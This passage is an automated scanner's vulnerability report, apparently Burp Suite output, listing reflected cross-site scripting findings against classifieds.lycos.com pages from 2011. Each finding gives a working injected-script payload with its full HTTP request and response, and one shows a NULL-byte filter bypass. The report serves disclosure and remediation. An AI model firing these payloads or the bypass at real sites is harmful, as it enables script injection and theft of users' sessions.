1.31. http://classifieds.lycos.com/housing-rent-commercial-office_space/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-rent-commercial-office_space/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5c80"><script>alert(1)</script>36e8e54f4e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-commercial-office_space/?c5c80"><script>alert(1)</script>36e8e54f4e2=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:10:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:10:16 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48279
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-commercial-office_space/?c5c80"><script>alert(1)</script>36e8e54f4e2=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13e8a"><script>alert(1)</script>00ac3d88a6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-condo13e8a"><script>alert(1)</script>00ac3d88a6d/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:08:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:53 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-condo13e8a"><script>alert(1)</script>00ac3d88a6d/?mobile=1" rel="nofollow"> ...[SNIP]...
1.33. http://classifieds.lycos.com/housing-rent-condo/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-rent-condo/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1e90"><script>alert(1)</script>362549775a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-condo/?c1e90"><script>alert(1)</script>362549775a0=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:08:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:11 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 55748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-condo/?c1e90"><script>alert(1)</script>362549775a0=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bfc4"><script>alert(1)</script>7ad962eae44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-home2bfc4"><script>alert(1)</script>7ad962eae44/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:37 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17706
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-home2bfc4"><script>alert(1)</script>7ad962eae44/?mobile=1" rel="nofollow"> ...[SNIP]...
1.35. http://classifieds.lycos.com/housing-rent-home/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-rent-home/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8c7"><script>alert(1)</script>4cd20fa0ed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-home/?8a8c7"><script>alert(1)</script>4cd20fa0ed6=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:48 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:48 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54490
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-home/?8a8c7"><script>alert(1)</script>4cd20fa0ed6=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce007"><script>alert(1)</script>b8ae2171e65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-homece007"><script>alert(1)</script>b8ae2171e65/fishhawk-ranch-2365223841 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:52 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-homece007"><script>alert(1)</script>b8ae2171e65/fishhawk-ranch-2365223841?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00783cb"><script>alert(1)</script>bb6e81bb1b5 was submitted in the REST URL parameter 2. This input was echoed as 783cb"><script>alert(1)</script>bb6e81bb1b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /housing-rent-home/fishhawk-ranch-2365223841%00783cb"><script>alert(1)</script>bb6e81bb1b5 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:53 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-home/fishhawk-ranch-2365223841%00783cb"><script>alert(1)</script>bb6e81bb1b5?mobile=1" rel="nofollow"> ...[SNIP]...
1.38. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-rent-home/fishhawk-ranch-2365223841
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7af7"><script>alert(1)</script>d3741c6c494 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-home/fishhawk-ranch-2365223841?a7af7"><script>alert(1)</script>d3741c6c494=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:29 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:29 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fhome; path=/ Set-Cookie: classifieds[lastpage][0][name]=Homes+for+Rent; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-home/fishhawk-ranch-2365223841?a7af7"><script>alert(1)</script>d3741c6c494=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1cd5"><script>alert(1)</script>12f816493e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-roommatesc1cd5"><script>alert(1)</script>12f816493e0/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:08:48 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:48 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17721
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-roommatesc1cd5"><script>alert(1)</script>12f816493e0/?mobile=1" rel="nofollow"> ...[SNIP]...
1.40. http://classifieds.lycos.com/housing-rent-roommates/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-rent-roommates/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4386a"><script>alert(1)</script>53f51d5a76c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-roommates/?4386a"><script>alert(1)</script>53f51d5a76c=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:08:09 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:09 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 56639
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-roommates/?4386a"><script>alert(1)</script>53f51d5a76c=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc0f"><script>alert(1)</script>175eb4ee6b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-short_term8fc0f"><script>alert(1)</script>175eb4ee6b6/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:08:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:50 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-short_term8fc0f"><script>alert(1)</script>175eb4ee6b6/?mobile=1" rel="nofollow"> ...[SNIP]...
1.42. http://classifieds.lycos.com/housing-rent-short_term/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-rent-short_term/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b35"><script>alert(1)</script>0ac4ae6fe4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-short_term/?35b35"><script>alert(1)</script>0ac4ae6fe4a=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:08:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:07 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-short_term/?35b35"><script>alert(1)</script>0ac4ae6fe4a=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7462"><script>alert(1)</script>626ed5a3760 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-storagef7462"><script>alert(1)</script>626ed5a3760/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:11:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:37 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17715
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-storagef7462"><script>alert(1)</script>626ed5a3760/?mobile=1" rel="nofollow"> ...[SNIP]...
1.44. http://classifieds.lycos.com/housing-rent-storage/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-rent-storage/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 442de"><script>alert(1)</script>f19e288b98e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-storage/?442de"><script>alert(1)</script>f19e288b98e=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:10:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:10:50 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40506
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-storage/?442de"><script>alert(1)</script>f19e288b98e=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c00ba"><script>alert(1)</script>d88c6e18e37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-vacationc00ba"><script>alert(1)</script>d88c6e18e37/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:08:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:34 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-vacationc00ba"><script>alert(1)</script>d88c6e18e37/?mobile=1" rel="nofollow"> ...[SNIP]...
1.46. http://classifieds.lycos.com/housing-rent-vacation/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-rent-vacation/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec671"><script>alert(1)</script>db069009273 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-vacation/?ec671"><script>alert(1)</script>db069009273=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:07:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:57 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65351
